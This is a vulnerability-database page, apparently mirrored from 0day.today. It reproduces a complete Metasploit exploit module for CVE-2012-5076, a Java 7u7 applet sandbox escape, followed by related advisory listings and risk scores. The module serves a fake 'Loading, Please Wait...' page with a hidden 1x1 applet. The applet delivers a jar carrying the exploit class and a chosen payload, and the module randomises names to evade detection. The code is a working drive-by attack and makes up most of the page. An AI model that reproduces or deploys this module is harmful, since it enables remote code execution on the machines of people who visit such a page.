Java Applet AverageRangeStatisticImpl Remote Code Execution

🗓️ 23 Jan 2013 00:00:00Reported by metasploitType

zdt🔗 0day.today👁 71 Views

Java Applet AverageRangeStatisticImpl Remote Code Execution. Exploits the AverageRangeStatisticImpl to run Java code outside of the sandbox in Java 7u7 and earlier

Reporter	Title	Published	Views	Family All 95
0day.today	Java Applet JAX-WS Remote Code Execution Vulnerability	13 Nov 201200:00	–	zdt
IBM Security Bulletins	Security Bulletin: Vulnerabilities in Rational Functional Tester versions 8.x due to security vulnerabilities in IBM JRE 7.0 Service Release 2 or earlier, and non-IBM Java 7.0	7 May 201913:40	–	ibm
IBM Security Bulletins	Security Bulletin: IBM Operational Decision Manager and WebSphere ILOG JRules: Multiple security vulnerabilities in IBM JRE 6.0	25 Sep 202223:13	–	ibm
ATTACKERKB	CVE-2012-5076	16 Oct 201200:00	–	attackerkb
Tenable Nessus	CentOS 6 : java-1.7.0-openjdk (CESA-2012:1386) (ROBOT)	18 Oct 201200:00	–	nessus
Tenable Nessus	GLSA-201401-30 : Oracle JRE/JDK: Multiple vulnerabilities (ROBOT)	27 Jan 201400:00	–	nessus
Tenable Nessus	GLSA-201406-32 : IcedTea JDK: Multiple vulnerabilities (BEAST) (ROBOT)	30 Jun 201400:00	–	nessus
Tenable Nessus	MiracleLinux 4 : java-1.7.0-openjdk-1.7.0.9-2.3.3.AXS4.1 (AXSA:2012-967:03)	14 Jan 202600:00	–	nessus
Tenable Nessus	openSUSE Security Update : java-1_7_0-openjdk (openSUSE-SU-2012:1419-1) (ROBOT)	13 Jun 201400:00	–	nessus
Tenable Nessus	Oracle Linux 6 : java-1.7.0-openjdk (ELSA-2012-1386)	12 Jul 201300:00	–	nessus

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  include Msf::Exploit::Remote::BrowserAutopwn
  autopwn_info({ :javascript => false })

  def initialize( info = {} )

    super( update_info( info,
      'Name'          => 'Java Applet AverageRangeStatisticImpl Remote Code Execution',
      'Description'   => %q{
          This module abuses the AverageRangeStatisticImpl from a Java Applet to run
        arbitrary Java code outside of the sandbox, a different exploit vector than the one
        exploited in the wild in November of 2012. The vulnerability affects Java version
        7u7 and earlier.
      },
      'License'       => MSF_LICENSE,
      'Author'        =>
        [
          'Unknown', # Vulnerability discovery at security-explorations
          'juan vazquez' # Metasploit module
        ],
      'References'    =>
        [
          [ 'CVE', '2012-5076' ],
          [ 'OSVDB', '86363' ],
          [ 'BID', '56054' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html' ],
          [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-5076' ],
          [ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-report.pdf' ]
        ],
      'Platform'      => [ 'java', 'win', 'osx', 'linux' ],
      'Payload'       => { 'Space' => 20480, 'DisableNops' => true },
      'Targets'       =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => ['java'],
              'Arch' => ARCH_JAVA,
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86,
            }
          ],
          [ 'Mac OS X x86 (Native Payload)',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X86,
            }
          ],
          [ 'Linux x86 (Native Payload)',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86,
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Oct 16 2012'
    ))
  end


  def setup
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2012-5076_2", "Exploit.class")
    @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2012-5076_2", "B.class")
    @loader_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    @exploit_class_name = rand_text_alpha("Exploit".length)
    @exploit_class.gsub!("Exploit", @exploit_class_name)
    super
  end

  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      jar = payload.encoded_jar
      jar.add_file("#{@exploit_class_name}.class", @exploit_class)
      jar.add_file("B.class", @loader_class)
      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str = rand_text_alpha("payload".length)
      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end

  end

  def generate_html
    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|
    return html
  end

end

#  0day.today [2018-01-04]  #

23 Jan 2013 00:00Current

1.2Low risk

Vulners AI Score1.2

EPSS0.91438